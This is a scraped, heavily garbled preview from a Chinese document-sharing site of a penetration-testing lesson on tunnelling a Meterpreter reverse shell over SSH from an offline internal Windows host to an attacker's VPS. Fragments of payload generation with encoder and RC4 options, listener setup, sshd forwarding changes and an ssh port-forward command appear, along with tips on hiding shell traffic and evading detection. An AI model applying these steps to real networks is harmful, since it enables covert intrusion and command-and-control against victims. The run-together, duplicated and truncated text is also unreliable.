一百二十二课利用隧道实现内网断网机meterpreter反向上线_第1页
一百二十二课利用隧道实现内网断网机meterpreter反向上线_第2页
一百二十二课利用隧道实现内网断网机meterpreter反向上线_第3页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

MITRE|ATT&CK中文借ssh隧道实现内MITRE|ATT&CK中文借ssh隧道实现内网断网机meterpreter反向上本节重点快速预览通过ssh隧道把目标内网下的断网机上的meterpreter直接反弹到我们自己公网的vps基础环境准备假设为目标一级内网下的一台linuxweb服务器只有此机器能正常连外网内网Ubuntu14-假设为目标一级内网下的一台普通的linux机器,且无法正常连外网,内网ip:win10-假设为目标一级内网下的一台windows客户机,且无法正常连外网,内网ip:假设为入侵者公网的一台vps机器,内网ip:针对上述环境的大致拓扑说明,如下1首先,准备好一个反向payload,之后继续Strike机器上做好监听,注意,此处payload的反连ip要Ubuntu14-LAMP机器的ip,具体如#- rc4password=klion-ex86/shikata_ga_nai-b1首先,准备好一个反向payload,之后继续Strike机器上做好监听,注意,此处payload的反连ip要Ubuntu14-LAMP机器的ip,具体如#- rc4password=klion-ex86/shikata_ga_nai-b'\x00'-i5-f-o>>payload>lport>lhost>rc4password>exitonsession>exploit-2.上面的基本准备工作做好之后,连到目标一级内网下的OldLamp机器上去开启ssh的端口转发功能,还是那句话如果目标监控比较到位,直接篡改系统配置文件,是有不小风险的,但好在并不是每个目标都做的那么到位,所以要适时根据自己的实际情况灵活变通,如#viAllowTcpForwardingGatewayPortsTCPKeepAlivePasswordAuthentication#/etc/init.d/sshd3.紧接着,就可以去目标一级内网下的Ubuntu14-LAMP机器,开始建立ssh隧道了,通过机器把meterpreter反弹到自己公网的vps#ssh-C-f-N-g-L0.0.0.0:53:192.168.3.96:53root@192.168.5.16-p#netstat-tulnp|grep4.最后,把payload丢到目标一级内网下的那台断网的win10-client机器上去执行,再回到Strike[vps]机器如期所致,meterpreter正常被如期所致,meterpreter正常被弹简单小结如果目标内网中同时有多台linux机器,为了能让你的shell活的更久一些,除了必要的免杀之外,不妨尝试这种方式让你的shell流量变得相对隐蔽一些,[当然,shell指的可不仅仅是meterpreter],毕竟是被封装在加隧道中的,相对于其它直接用明文传送方式,被侦测到的几率会小很多,不过需要注意的是,在实战中,如果贸然直用自己的vps这样

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论